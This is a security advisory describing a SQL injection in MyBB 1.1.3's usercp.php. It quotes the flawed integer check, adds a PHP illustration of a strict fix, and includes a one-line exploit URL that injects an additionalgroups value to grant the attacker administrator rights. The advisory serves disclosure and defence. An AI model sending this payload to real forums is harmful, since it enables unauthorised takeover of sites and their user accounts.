----------------Summary----------------
Software: MyBB
Software's Web Site: http://www.mybboard.com
Versions: 1.1.3
Class: Remote
Status: Patched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: high
----------------Description----------------
There is a security bug in the usercp.php file of MyBB 1.1.3 (the latest version, fully patched) that allows an attacker to perform a SQL injection attack.
The bug results from poor checking of quotation marks in user-supplied variables that are expected to be integers, where the code tries to cast strings to integers, and from forgetting to add slashes to variables that are inserted into a SQL query.
Because this bug is in an INSERT query on the user tables, there is an easy way to make yourself the forum's admin; other attacks are possible too.
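----------------See Also----------------
{usercp.php} near line 721
// Loose comparison: before PHP 8.0 a string that merely starts with "1"
// compares equal to 1, so it is left unchanged and is never cast to an integer.
if($mybb->input['showcodebuttons'] != 1)
{
	$mybb->input['showcodebuttons'] = 0;
}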
----------------Exploit----------------
mybb/usercp.php?action=do_options&
showcodebuttons=1',additionalgroups='4
----------------Solution----------------
Upgrade to the vendor-provided patch.
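The following is an added illustration, not MyBB source and not the vendor's patch: it runs the check quoted from usercp.php beside a strict version over the value from the Exploit section. The function names and the shape of the SQL fragment are assumptions made for the example.

```php
<?php
// Added example, not MyBB source. The third input is the value from the
// Exploit section; the SQL fragment shape is an assumption for illustration.

// The check from usercp.php: anything loosely equal to 1 is left untouched.
function flag_loose($value)
{
    if ($value != 1) {
        $value = 0;
    }
    return $value; // may still be the caller's original string
}

// Hardened form: only the exact value 1 or '1' maps to 1, everything else
// becomes 0, and the result is always an integer.
function flag_strict($value)
{
    return ($value === '1' || $value === 1) ? 1 : 0;
}

// Hypothetical fragment showing where the value would land in a query.
function assignment_fragment($value)
{
    return "showcodebuttons='" . $value . "'";
}

$inputs = array(
    '1',                       // legitimate
    '0',                       // legitimate
    "1',additionalgroups='4",  // value from the Exploit section
);

foreach ($inputs as $raw) {
    $loose  = flag_loose($raw);
    $strict = flag_strict($raw);
    printf("input : %s\n", $raw);
    printf("  loose  -> %s (%s)\n", assignment_fragment($loose), gettype($loose));
    printf("  strict -> %s (%s)\n\n", assignment_fragment($strict), gettype($strict));
}

// PHP before 8.0 converts "1',additionalgroups='4" to the number 1 for the
// != comparison, so flag_loose() returns the full string and the quote
// reaches the query. PHP 8.0+ compares such strings as strings, but the
// strict form does not depend on the interpreter's comparison rules.
```

Normalising to an integer removes the quote before any query is built; escaping or parameter binding is still needed for the values that must remain strings.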
----------------Credit----------------
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security
Owner credit:
http://community.mybboard.net/showthread.php?tid=9955
Left by imei on June 22nd, 2006
http://www.securityfocus.com/bid/18602
Left by imei on June 23rd, 2006
http://secunia.com/advisories/20795/
Left by imei on June 26th, 2006